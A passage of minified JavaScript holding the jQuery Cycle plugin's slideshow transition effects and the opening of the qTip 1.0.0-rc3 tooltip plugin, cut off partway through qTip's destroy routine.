 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 */
(function($){$.fn.cycle.transitions.none=function($cont,$slides,opts){opts.fxFn=function(curr,next,opts,after){$(next).show();$(curr).hide();after();};};$.fn.cycle.transitions.scrollUp=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssBefore={top:h,left:0};opts.cssFirst={top:0};opts.animIn={top:0};opts.animOut={top:-h};};$.fn.cycle.transitions.scrollDown=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssFirst={top:0};opts.cssBefore={top:-h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.scrollLeft=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:0-w};};$.fn.cycle.transitions.scrollRight=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:-w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.scrollHorz=function($cont,$slides,opts){$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.left=fwd?(next.cycleW-1):(1-next.cycleW);opts.animOut.left=fwd?-curr.cycleW:curr.cycleW;});opts.cssFirst={left:0};opts.cssBefore={top:0};opts.animIn={left:0};opts.animOut={top:0};};$.fn.cycle.transitions.scrollVert=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.top=fwd?(1-next.cycleH):(next.cycleH-1);opts.animOut.top=fwd?curr.cycleH:-curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0};opts.animIn={top:0};opts.animOut={left:0};};$.fn.cycle.transitions.slideX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;});opts.cssBefore={left:0,top:0,width:0};opts.animIn={width:"show"};opts.animOut={width:0};};$.fn.cycle.transitions.slideY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;});opts.cssBefore={left:0,top:0,height:0};opts.animIn={height:"show"};opts.animOut={height:0};};$.fn.cycle.transitions.shuffle=function($cont,$slides,opts){var i,w=$cont.css("overflow","visible").width();$slides.css({left:0,top:0});opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);});if(!opts.speedAdjusted){opts.speed=opts.speed/2;opts.speedAdjusted=true;}opts.random=0;opts.shuffle=opts.shuffle||{left:-w,top:15};opts.els=[];for(i=0;i<$slides.length;i++){opts.els.push($slides[i]);}for(i=0;i<opts.currSlide;i++){opts.els.push(opts.els.shift());}opts.fxFn=function(curr,next,opts,cb,fwd){var $el=fwd?$(curr):$(next);$(next).css(opts.cssBefore);var count=opts.slideCount;$el.animate(opts.shuffle,opts.speedIn,opts.easeIn,function(){var hops=$.fn.cycle.hopsFromLast(opts,fwd);for(var k=0;k<hops;k++){fwd?opts.els.push(opts.els.shift()):opts.els.unshift(opts.els.pop());}if(fwd){for(var i=0,len=opts.els.length;i<len;i++){$(opts.els[i]).css("z-index",len-i+count);}}else{var z=$(curr).css("z-index");$el.css("z-index",parseInt(z)+1+count);}$el.animate({left:0,top:0},opts.speedOut,opts.easeOut,function(){$(fwd?this:curr).hide();if(cb){cb();}});});};opts.cssBefore={display:"block",opacity:1,top:0,left:0};};$.fn.cycle.transitions.turnUp=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=next.cycleH;opts.animIn.height=next.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,height:0};opts.animIn={top:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnDown=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,top:0,height:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnLeft=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=next.cycleW;opts.animIn.width=next.cycleW;});opts.cssBefore={top:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.turnRight=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={top:0,left:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.zoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false,true);opts.cssBefore.top=next.cycleH/2;opts.cssBefore.left=next.cycleW/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};opts.animOut={width:0,height:0,top:curr.cycleH/2,left:curr.cycleW/2};});opts.cssFirst={top:0,left:0};opts.cssBefore={width:0,height:0};};$.fn.cycle.transitions.fadeZoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false);opts.cssBefore.left=next.cycleW/2;opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};});opts.cssBefore={width:0,height:0};opts.animOut={opacity:0};};$.fn.cycle.transitions.blindX=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.blindY=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.blindZ=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();var w=$cont.width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:w};opts.animIn={top:0,left:0};opts.animOut={top:h,left:w};};$.fn.cycle.transitions.growX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=this.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:0};});opts.cssBefore={width:0,top:0};};$.fn.cycle.transitions.growY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=this.cycleH/2;opts.animIn={top:0,height:this.cycleH};opts.animOut={top:0};});opts.cssBefore={height:0,left:0};};$.fn.cycle.transitions.curtainX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true,true);opts.cssBefore.left=next.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:curr.cycleW/2,width:0};});opts.cssBefore={top:0,width:0};};$.fn.cycle.transitions.curtainY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false,true);opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,height:next.cycleH};opts.animOut={top:curr.cycleH/2,height:0};});opts.cssBefore={left:0,height:0};};$.fn.cycle.transitions.cover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);if(d=="right"){opts.cssBefore.left=-w;}else{if(d=="up"){opts.cssBefore.top=h;}else{if(d=="down"){opts.cssBefore.top=-h;}else{opts.cssBefore.left=w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.uncover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(d=="right"){opts.animOut.left=w;}else{if(d=="up"){opts.animOut.top=-h;}else{if(d=="down"){opts.animOut.top=h;}else{opts.animOut.left=-w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.toss=function($cont,$slides,opts){var w=$cont.css("overflow","visible").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(!opts.animOut.left&&!opts.animOut.top){opts.animOut={left:w*2,top:-h/2,opacity:0};}else{opts.animOut.opacity=0;}});opts.cssBefore={left:0,top:0};opts.animIn={left:0};};$.fn.cycle.transitions.wipe=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.cssBefore=opts.cssBefore||{};var clip;if(opts.clip){if(/l2r/.test(opts.clip)){clip="rect(0px 0px "+h+"px 0px)";}else{if(/r2l/.test(opts.clip)){clip="rect(0px "+w+"px "+h+"px "+w+"px)";}else{if(/t2b/.test(opts.clip)){clip="rect(0px "+w+"px 0px 0px)";}else{if(/b2t/.test(opts.clip)){clip="rect("+h+"px "+w+"px "+h+"px 0px)";}else{if(/zoom/.test(opts.clip)){var top=parseInt(h/2);var left=parseInt(w/2);clip="rect("+top+"px "+left+"px "+top+"px "+left+"px)";}}}}}}opts.cssBefore.clip=opts.cssBefore.clip||clip||"rect(0px 0px 0px 0px)";var d=opts.cssBefore.clip.match(/(\d+)/g);var t=parseInt(d[0]),r=parseInt(d[1]),b=parseInt(d[2]),l=parseInt(d[3]);opts.before.push(function(curr,next,opts){if(curr==next){return;}var $curr=$(curr),$next=$(next);$.fn.cycle.commonReset(curr,next,opts,true,true,false);opts.cssAfter.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);

/*
 * jquery.qtip. The jQuery tooltip plugin
 *
 * Copyright (c) 2009 Craig Thompson
 * http://craigsworks.com
 *
 * Licensed under MIT
 * http://www.opensource.org/licenses/mit-license.php
 *
 * Launch  : February 2009
 * Version : 1.0.0-rc3
 * Released: Tuesday 12th May, 2009 - 00:00
 * Debug: jquery.qtip.debug.js
 */
(function(f){f.fn.qtip=function(B,u){var y,t,A,s,x,w,v,z;if(typeof B=="string"){if(typeof f(this).data("qtip")!=="object"){f.fn.qtip.log.error.call(self,1,f.fn.qtip.constants.NO_TOOLTIP_PRESENT,false)}if(B=="api"){return f(this).data("qtip").interfaces[f(this).data("qtip").current]}else{if(B=="interfaces"){return f(this).data("qtip").interfaces}}}else{if(!B){B={}}if(typeof B.content!=="object"||(B.content.jquery&&B.content.length>0)){B.content={text:B.content}}if(typeof B.content.title!=="object"){B.content.title={text:B.content.title}}if(typeof B.position!=="object"){B.position={corner:B.position}}if(typeof B.position.corner!=="object"){B.position.corner={target:B.position.corner,tooltip:B.position.corner}}if(typeof B.show!=="object"){B.show={when:B.show}}if(typeof B.show.when!=="object"){B.show.when={event:B.show.when}}if(typeof B.show.effect!=="object"){B.show.effect={type:B.show.effect}}if(typeof B.hide!=="object"){B.hide={when:B.hide}}if(typeof B.hide.when!=="object"){B.hide.when={event:B.hide.when}}if(typeof B.hide.effect!=="object"){B.hide.effect={type:B.hide.effect}}if(typeof B.style!=="object"){B.style={name:B.style}}B.style=c(B.style);s=f.extend(true,{},f.fn.qtip.defaults,B);s.style=a.call({options:s},s.style);s.user=f.extend(true,{},B)}return f(this).each(function(){if(typeof B=="string"){w=B.toLowerCase();A=f(this).qtip("interfaces");if(typeof A=="object"){if(u===true&&w=="destroy"){while(A.length>0){A[A.length-1].destroy()}}else{if(u!==true){A=[f(this).qtip("api")]}for(y=0;y<A.length;y++){if(w=="destroy"){A[y].destroy()}else{if(A[y].status.rendered===true){if(w=="show"){A[y].show()}else{if(w=="hide"){A[y].hide()}else{if(w=="focus"){A[y].focus()}else{if(w=="disable"){A[y].disable(true)}else{if(w=="enable"){A[y].disable(false)}}}}}}}}}}}else{v=f.extend(true,{},s);v.hide.effect.length=s.hide.effect.length;v.show.effect.length=s.show.effect.length;if(v.position.container===false){v.position.container=f(document.body)}if(v.position.target===false){v.position.target=f(this)}if(v.show.when.target===false){v.show.when.target=f(this)}if(v.hide.when.target===false){v.hide.when.target=f(this)}t=f.fn.qtip.interfaces.length;for(y=0;y<t;y++){if(typeof f.fn.qtip.interfaces[y]=="undefined"){t=y;break}}x=new d(f(this),v,t);f.fn.qtip.interfaces[t]=x;if(typeof f(this).data("qtip")=="object"){if(typeof f(this).attr("qtip")==="undefined"){f(this).data("qtip").current=f(this).data("qtip").interfaces.length}f(this).data("qtip").interfaces.push(x)}else{f(this).data("qtip",{current:0,interfaces:[x]})}if(v.content.prerender===false&&v.show.when.event!==false&&v.show.ready!==true){v.show.when.target.bind(v.show.when.event+".qtip-"+t+"-create",{qtip:t},function(C){z=f.fn.qtip.interfaces[C.data.qtip];z.options.show.when.target.unbind(z.options.show.when.event+".qtip-"+C.data.qtip+"-create");z.cache.mouse={x:C.pageX,y:C.pageY};p.call(z);z.options.show.when.target.trigger(z.options.show.when.event)})}else{x.cache.mouse={x:v.show.when.target.offset().left,y:v.show.when.target.offset().top};p.call(x)}}})};function d(u,t,v){var s=this;s.id=v;s.options=t;s.status={animated:false,rendered:false,disabled:false,focused:false};s.elements={target:u.addClass(s.options.style.classes.target),tooltip:null,wrapper:null,content:null,contentWrapper:null,title:null,button:null,tip:null,bgiframe:null};s.cache={mouse:{},position:{},toggle:0};s.timers={};f.extend(s,s.options.api,{show:function(y){var x,z;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"show")}if(s.elements.tooltip.css("display")!=="none"){return s}s.elements.tooltip.stop(true,false);x=s.beforeShow.call(s,y);if(x===false){return s}function w(){if(s.options.position.type!=="static"){s.focus()}s.onShow.call(s,y);if(f.browser.msie){s.elements.tooltip.get(0).style.removeAttribute("filter")}}s.cache.toggle=1;if(s.options.position.type!=="static"){s.updatePosition(y,(s.options.show.effect.length>0))}if(typeof s.options.show.solo=="object"){z=f(s.options.show.solo)}else{if(s.options.show.solo===true){z=f("div.qtip").not(s.elements.tooltip)}}if(z){z.each(function(){if(f(this).qtip("api").status.rendered===true){f(this).qtip("api").hide()}})}if(typeof s.options.show.effect.type=="function"){s.options.show.effect.type.call(s.elements.tooltip,s.options.show.effect.length);s.elements.tooltip.queue(function(){w();f(this).dequeue()})}else{switch(s.options.show.effect.type.toLowerCase()){case"fade":s.elements.tooltip.fadeIn(s.options.show.effect.length,w);break;case"slide":s.elements.tooltip.slideDown(s.options.show.effect.length,function(){w();if(s.options.position.type!=="static"){s.updatePosition(y,true)}});break;case"grow":s.elements.tooltip.show(s.options.show.effect.length,w);break;default:s.elements.tooltip.show(null,w);break}s.elements.tooltip.addClass(s.options.style.classes.active)}return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_SHOWN,"show")},hide:function(y){var x;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"hide")}else{if(s.elements.tooltip.css("display")==="none"){return s}}clearTimeout(s.timers.show);s.elements.tooltip.stop(true,false);x=s.beforeHide.call(s,y);if(x===false){return s}function w(){s.onHide.call(s,y)}s.cache.toggle=0;if(typeof s.options.hide.effect.type=="function"){s.options.hide.effect.type.call(s.elements.tooltip,s.options.hide.effect.length);s.elements.tooltip.queue(function(){w();f(this).dequeue()})}else{switch(s.options.hide.effect.type.toLowerCase()){case"fade":s.elements.tooltip.fadeOut(s.options.hide.effect.length,w);break;case"slide":s.elements.tooltip.slideUp(s.options.hide.effect.length,w);break;case"grow":s.elements.tooltip.hide(s.options.hide.effect.length,w);break;default:s.elements.tooltip.hide(null,w);break}s.elements.tooltip.removeClass(s.options.style.classes.active)}return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_HIDDEN,"hide")},updatePosition:function(w,x){var C,G,L,J,H,E,y,I,B,D,K,A,F,z;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"updatePosition")}else{if(s.options.position.type=="static"){return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.CANNOT_POSITION_STATIC,"updatePosition")}}G={position:{left:0,top:0},dimensions:{height:0,width:0},corner:s.options.position.corner.target};L={position:s.getPosition(),dimensions:s.getDimensions(),corner:s.options.position.corner.tooltip};if(s.options.position.target!=="mouse"){if(s.options.position.target.get(0).nodeName.toLowerCase()=="area"){J=s.options.position.target.attr("coords").split(",");for(C=0;C<J.length;C++){J[C]=parseInt(J[C])}H=s.options.position.target.parent("map").attr("name");E=f('img[usemap="#'+H+'"]:first').offset();G.position={left:Math.floor(E.left+J[0]),top:Math.floor(E.top+J[1])};switch(s.options.position.target.attr("shape").toLowerCase()){case"rect":G.dimensions={width:Math.ceil(Math.abs(J[2]-J[0])),height:Math.ceil(Math.abs(J[3]-J[1]))};break;case"circle":G.dimensions={width:J[2]+1,height:J[2]+1};break;case"poly":G.dimensions={width:J[0],height:J[1]};for(C=0;C<J.length;C++){if(C%2==0){if(J[C]>G.dimensions.width){G.dimensions.width=J[C]}if(J[C]<J[0]){G.position.left=Math.floor(E.left+J[C])}}else{if(J[C]>G.dimensions.height){G.dimensions.height=J[C]}if(J[C]<J[1]){G.position.top=Math.floor(E.top+J[C])}}}G.dimensions.width=G.dimensions.width-(G.position.left-E.left);G.dimensions.height=G.dimensions.height-(G.position.top-E.top);break;default:return f.fn.qtip.log.error.call(s,4,f.fn.qtip.constants.INVALID_AREA_SHAPE,"updatePosition");break}G.dimensions.width-=2;G.dimensions.height-=2}else{if(s.options.position.target.add(document.body).length===1){G.position={left:f(document).scrollLeft(),top:f(document).scrollTop()};G.dimensions={height:f(window).height(),width:f(window).width()}}else{if(typeof s.options.position.target.attr("qtip")!=="undefined"){G.position=s.options.position.target.qtip("api").cache.position}else{G.position=s.options.position.target.offset()}G.dimensions={height:s.options.position.target.outerHeight(),width:s.options.position.target.outerWidth()}}}y=f.extend({},G.position);if(G.corner.search(/right/i)!==-1){y.left+=G.dimensions.width}if(G.corner.search(/bottom/i)!==-1){y.top+=G.dimensions.height}if(G.corner.search(/((top|bottom)Middle)|center/)!==-1){y.left+=(G.dimensions.width/2)}if(G.corner.search(/((left|right)Middle)|center/)!==-1){y.top+=(G.dimensions.height/2)}}else{G.position=y={left:s.cache.mouse.x,top:s.cache.mouse.y};G.dimensions={height:1,width:1}}if(L.corner.search(/right/i)!==-1){y.left-=L.dimensions.width}if(L.corner.search(/bottom/i)!==-1){y.top-=L.dimensions.height}if(L.corner.search(/((top|bottom)Middle)|center/)!==-1){y.left-=(L.dimensions.width/2)}if(L.corner.search(/((left|right)Middle)|center/)!==-1){y.top-=(L.dimensions.height/2)}I=(f.browser.msie)?1:0;B=(f.browser.msie&&parseInt(f.browser.version.charAt(0))===6)?1:0;if(s.options.style.border.radius>0){if(L.corner.search(/Left/)!==-1){y.left-=s.options.style.border.radius}else{if(L.corner.search(/Right/)!==-1){y.left+=s.options.style.border.radius}}if(L.corner.search(/Top/)!==-1){y.top-=s.options.style.border.radius}else{if(L.corner.search(/Bottom/)!==-1){y.top+=s.options.style.border.radius}}}if(I){if(L.corner.search(/top/)!==-1){y.top-=I}else{if(L.corner.search(/bottom/)!==-1){y.top+=I}}if(L.corner.search(/left/)!==-1){y.left-=I}else{if(L.corner.search(/right/)!==-1){y.left+=I}}if(L.corner.search(/leftMiddle|rightMiddle/)!==-1){y.top-=1}}if(s.options.position.adjust.screen===true){y=o.call(s,y,G,L)}if(s.options.position.target==="mouse"&&s.options.position.adjust.mouse===true){if(s.options.position.adjust.screen===true&&s.elements.tip){K=s.elements.tip.attr("rel")}else{K=s.options.position.corner.tooltip}y.left+=(K.search(/right/i)!==-1)?-6:6;y.top+=(K.search(/bottom/i)!==-1)?-6:6}if(!s.elements.bgiframe&&f.browser.msie&&parseInt(f.browser.version.charAt(0))==6){f("select, object").each(function(){A=f(this).offset();A.bottom=A.top+f(this).height();A.right=A.left+f(this).width();if(y.top+L.dimensions.height>=A.top&&y.left+L.dimensions.width>=A.left){k.call(s)}})}y.left+=s.options.position.adjust.x;y.top+=s.options.position.adjust.y;F=s.getPosition();if(y.left!=F.left||y.top!=F.top){z=s.beforePositionUpdate.call(s,w);if(z===false){return s}s.cache.position=y;if(x===true){s.status.animated=true;s.elements.tooltip.animate(y,200,"swing",function(){s.status.animated=false})}else{s.elements.tooltip.css(y)}s.onPositionUpdate.call(s,w);if(typeof w!=="undefined"&&w.type&&w.type!=="mousemove"){f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_POSITION_UPDATED,"updatePosition")}}return s},updateWidth:function(w){var x;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"updateWidth")}else{if(w&&typeof w!=="number"){return f.fn.qtip.log.error.call(s,2,"newWidth must be of type number","updateWidth")}}x=s.elements.contentWrapper.siblings().add(s.elements.tip).add(s.elements.button);if(!w){if(typeof s.options.style.width.value=="number"){w=s.options.style.width.value}else{s.elements.tooltip.css({width:"auto"});x.hide();if(f.browser.msie){s.elements.wrapper.add(s.elements.contentWrapper.children()).css({zoom:"normal"})}w=s.getDimensions().width+1;if(!s.options.style.width.value){if(w>s.options.style.width.max){w=s.options.style.width.max}if(w<s.options.style.width.min){w=s.options.style.width.min}}}}if(w%2!==0){w-=1}s.elements.tooltip.width(w);x.show();if(s.options.style.border.radius){s.elements.tooltip.find(".qtip-betweenCorners").each(function(y){f(this).width(w-(s.options.style.border.radius*2))})}if(f.browser.msie){s.elements.wrapper.add(s.elements.contentWrapper.children()).css({zoom:"1"});s.elements.wrapper.width(w);if(s.elements.bgiframe){s.elements.bgiframe.width(w).height(s.getDimensions.height)}}return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_WIDTH_UPDATED,"updateWidth")},updateStyle:function(w){var z,A,x,y,B;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"updateStyle")}else{if(typeof w!=="string"||!f.fn.qtip.styles[w]){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.STYLE_NOT_DEFINED,"updateStyle")}}s.options.style=a.call(s,f.fn.qtip.styles[w],s.options.user.style);s.elements.content.css(q(s.options.style));if(s.options.content.title.text!==false){s.elements.title.css(q(s.options.style.title,true))}s.elements.contentWrapper.css({borderColor:s.options.style.border.color});if(s.options.style.tip.corner!==false){if(f("<canvas>").get(0).getContext){z=s.elements.tooltip.find(".qtip-tip canvas:first");x=z.get(0).getContext("2d");x.clearRect(0,0,300,300);y=z.parent("div[rel]:first").attr("rel");B=b(y,s.options.style.tip.size.width,s.options.style.tip.size.height);h.call(s,z,B,s.options.style.tip.color||s.options.style.border.color)}else{if(f.browser.msie){z=s.elements.tooltip.find('.qtip-tip [nodeName="shape"]');z.attr("fillcolor",s.options.style.tip.color||s.options.style.border.color)}}}if(s.options.style.border.radius>0){s.elements.tooltip.find(".qtip-betweenCorners").css({backgroundColor:s.options.style.border.color});if(f("<canvas>").get(0).getContext){A=g(s.options.style.border.radius);s.elements.tooltip.find(".qtip-wrapper canvas").each(function(){x=f(this).get(0).getContext("2d");x.clearRect(0,0,300,300);y=f(this).parent("div[rel]:first").attr("rel");r.call(s,f(this),A[y],s.options.style.border.radius,s.options.style.border.color)})}else{if(f.browser.msie){s.elements.tooltip.find('.qtip-wrapper [nodeName="arc"]').each(function(){f(this).attr("fillcolor",s.options.style.border.color)})}}}return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_STYLE_UPDATED,"updateStyle")},updateContent:function(A,y){var z,x,w;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"updateContent")}else{if(!A){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.NO_CONTENT_PROVIDED,"updateContent")}}z=s.beforeContentUpdate.call(s,A);if(typeof z=="string"){A=z}else{if(z===false){return}}if(f.browser.msie){s.elements.contentWrapper.children().css({zoom:"normal"})}if(A.jquery&&A.length>0){A.clone(true).appendTo(s.elements.content).show()}else{s.elements.content.html(A)}x=s.elements.content.find("img[complete=false]");if(x.length>0){w=0;x.each(function(C){f('<img src="'+f(this).attr("src")+'" />').load(function(){if(++w==x.length){B()}})})}else{B()}function B(){s.updateWidth();if(y!==false){if(s.options.position.type!=="static"){s.updatePosition(s.elements.tooltip.is(":visible"),true)}if(s.options.style.tip.corner!==false){n.call(s)}}}s.onContentUpdate.call(s);return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_CONTENT_UPDATED,"loadContent")},loadContent:function(w,z,A){var y;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"loadContent")}y=s.beforeContentLoad.call(s);if(y===false){return s}if(A=="post"){f.post(w,z,x)}else{f.get(w,z,x)}function x(B){s.onContentLoad.call(s);f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_CONTENT_LOADED,"loadContent");s.updateContent(B)}return s},updateTitle:function(w){if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"updateTitle")}else{if(!w){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.NO_CONTENT_PROVIDED,"updateTitle")}}returned=s.beforeTitleUpdate.call(s);if(returned===false){return s}if(s.elements.button){s.elements.button=s.elements.button.clone(true)}s.elements.title.html(w);if(s.elements.button){s.elements.title.prepend(s.elements.button)}s.onTitleUpdate.call(s);return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_TITLE_UPDATED,"updateTitle")},focus:function(A){var y,x,w,z;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"focus")}else{if(s.options.position.type=="static"){return f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.CANNOT_FOCUS_STATIC,"focus")}}y=parseInt(s.elements.tooltip.css("z-index"));x=6000+f("div.qtip[qtip]").length-1;if(!s.status.focused&&y!==x){z=s.beforeFocus.call(s,A);if(z===false){return s}f("div.qtip[qtip]").not(s.elements.tooltip).each(function(){if(f(this).qtip("api").status.rendered===true){w=parseInt(f(this).css("z-index"));if(typeof w=="number"&&w>-1){f(this).css({zIndex:parseInt(f(this).css("z-index"))-1})}f(this).qtip("api").status.focused=false}});s.elements.tooltip.css({zIndex:x});s.status.focused=true;s.onFocus.call(s,A);f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_FOCUSED,"focus")}return s},disable:function(w){if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"disable")}if(w){if(!s.status.disabled){s.status.disabled=true;f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_DISABLED,"disable")}else{f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.TOOLTIP_ALREADY_DISABLED,"disable")}}else{if(s.status.disabled){s.status.disabled=false;f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_ENABLED,"disable")}else{f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.TOOLTIP_ALREADY_ENABLED,"disable")}}return s},destroy:function(){var w,x,y;x=s.beforeDestroy.call(s);if(x===false){return s}if(s.status.rendered){s.options.show.when.target.unbind("mousemove.qtip",s.updatePosition);s.options.show.when.target.unbind("mouseout.qtip",s.hide);s.options.show.when.target.unbind(s.options.show.when.event+".qtip");s.options.hide.when.target.unbind(s.options.hide.when.event+".qtip");s.elements.tooltip.unbind(s.options.hide.when.event+".qtip");s.elements.tooltip.unbind("mouseover.qtip",s.focus);s.elements.tooltip.remove()}else{s.options.show.when.target.unbind(s.options.show.when.event+".qtip-create")}if(typeof s.elements.target.data("qtip")=="object"){y=s.elements.target.data("qtip").interfaces;if(typeof y=="object"&&y.length>0){for(w=0;w<y.length-1;w++){if(y[w].id==s.id){y.splice(w,1)}}}}delete f.fn.qtip.interfaces[s.id];if(typeof 